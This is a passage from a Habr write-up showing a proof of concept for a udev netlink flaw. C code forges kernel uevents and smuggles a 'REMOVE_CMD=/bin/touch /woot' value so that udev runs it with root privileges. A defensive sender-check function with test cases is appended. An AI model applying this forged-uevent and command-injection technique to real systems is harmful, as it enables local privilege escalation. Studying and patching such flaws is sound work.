int netlink_socket = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
Consult man 7 netlink and fill in the destination address for the packet:
struct sockaddr_nl dest;
memset(&dest, 0, sizeof(dest));
dest.nl_family = AF_NETLINK;
dest.nl_pid = pidof_udev;
Run strace -p `pidof udevd`, plug something into USB and get the approximate packet format:
/* uevent datagram: "action@devpath" header followed by NUL-separated KEY=value pairs */
#define REQ(act, dev) \
    act "@/class/mem/" dev "\0" \
    "UDEV_LOG=3\0" \
    "ACTION=" act "\0" \
    "DEVPATH=/class/mem/" dev "\0" \
    "SUBSYSTEM=mem\0" \
    "MAJOR=1\0" \
    "MINOR=1\0" \
    "SEQNUM=3747\0" \
    "UDEVD_EVENT=1\0" \
    "DEVNAME=/dev/" dev "\0"
char req1[] = REQ("add", "ufo");
sendto(netlink_socket, req1, sizeof(req1)-1, 0, (struct sockaddr*)&dest, sizeof(dest));
And we get the answer “Connection refused”.
dest.nl_pid = pidof_udev - 1;
After that, send() did not return any errors, and moreover, a strange /dev/ufo file appeared in /dev, which had just been created through a hole in udev. Creating a device is not very interesting, though; it is better to execute your own code. /dev/mem and /dev/kmem are interesting, but for a proof of concept you can take a shortcut. Run grep -r RUN /etc/udev/rules.d/ and find a strangely written rule:
ACTION=="remove", ENV{REMOVE_CMD}!="", RUN+="$env{REMOVE_CMD}"
Send a remove event for /dev/ufo:
char req2[] = REQ("remove", "ufo") "REMOVE_CMD=/bin/touch /woot\0";
sendto(netlink_socket, req2, sizeof(req2)-1, 0, (struct sockaddr*)&dest, sizeof(dest));
Run it ... a UFO flew in and left the file /woot!
Source: https://habr.com/ru/post/57687/
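A uevent listener can refuse datagrams like the ones above by checking where they came from: the kernel sends uevents as multicast with sender port 0, while a local process's sendto() arrives as unicast from a non-zero port. The following is an added example, not code from the article or from udev; the function names, the verdict enum and the sample pid/uid values are assumptions made for illustration.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/netlink.h>

enum uevent_verdict {
    UEVENT_ACCEPT = 0,
    UEVENT_DROP_UNICAST,   /* sent straight to our nl_pid with sendto() */
    UEVENT_DROP_USER_PID,  /* sender port belongs to a userspace process */
    UEVENT_DROP_NO_CREDS,  /* no SCM_CREDENTIALS control message attached */
    UEVENT_DROP_NOT_ROOT   /* credentials present but uid is not 0 */
};

/* src is the sender address recvmsg() stores in msg_name; have_creds and
 * sender_uid come from the SCM_CREDENTIALS control message, which the
 * listener enables with SO_PASSCRED before receiving. */
enum uevent_verdict check_uevent_sender(const struct sockaddr_nl *src,
                                        int have_creds, uid_t sender_uid)
{
    if (src->nl_groups == 0)        /* kernel uevents are multicast */
        return UEVENT_DROP_UNICAST;
    if (src->nl_pid != 0)           /* the kernel's netlink port id is 0 */
        return UEVENT_DROP_USER_PID;
    if (!have_creds)
        return UEVENT_DROP_NO_CREDS;
    if (sender_uid != 0)
        return UEVENT_DROP_NOT_ROOT;
    return UEVENT_ACCEPT;
}

/* Hypothetical helper: build a constructed sender address and classify it. */
enum uevent_verdict verdict_for(unsigned pid, unsigned groups,
                                int have_creds, uid_t uid)
{
    struct sockaddr_nl src = { .nl_family = AF_NETLINK,
                               .nl_pid = pid, .nl_groups = groups };
    return check_uevent_sender(&src, have_creds, uid);
}

int main(void)
{
    /* Constructed cases: a genuine kernel broadcast, a unicast from a
     * local user as in the article, and a multicast from a userspace port. */
    printf("kernel broadcast: %d\n", verdict_for(0, 1, 1, 0));
    printf("local unicast:    %d\n", verdict_for(4321, 0, 1, 1000));
    printf("user multicast:   %d\n", verdict_for(4321, 1, 1, 0));
    return 0;
}
```

In a real listener the check runs on every recvmsg() result before the payload is parsed, so a rule such as the REMOVE_CMD one never sees attacker-supplied environment values.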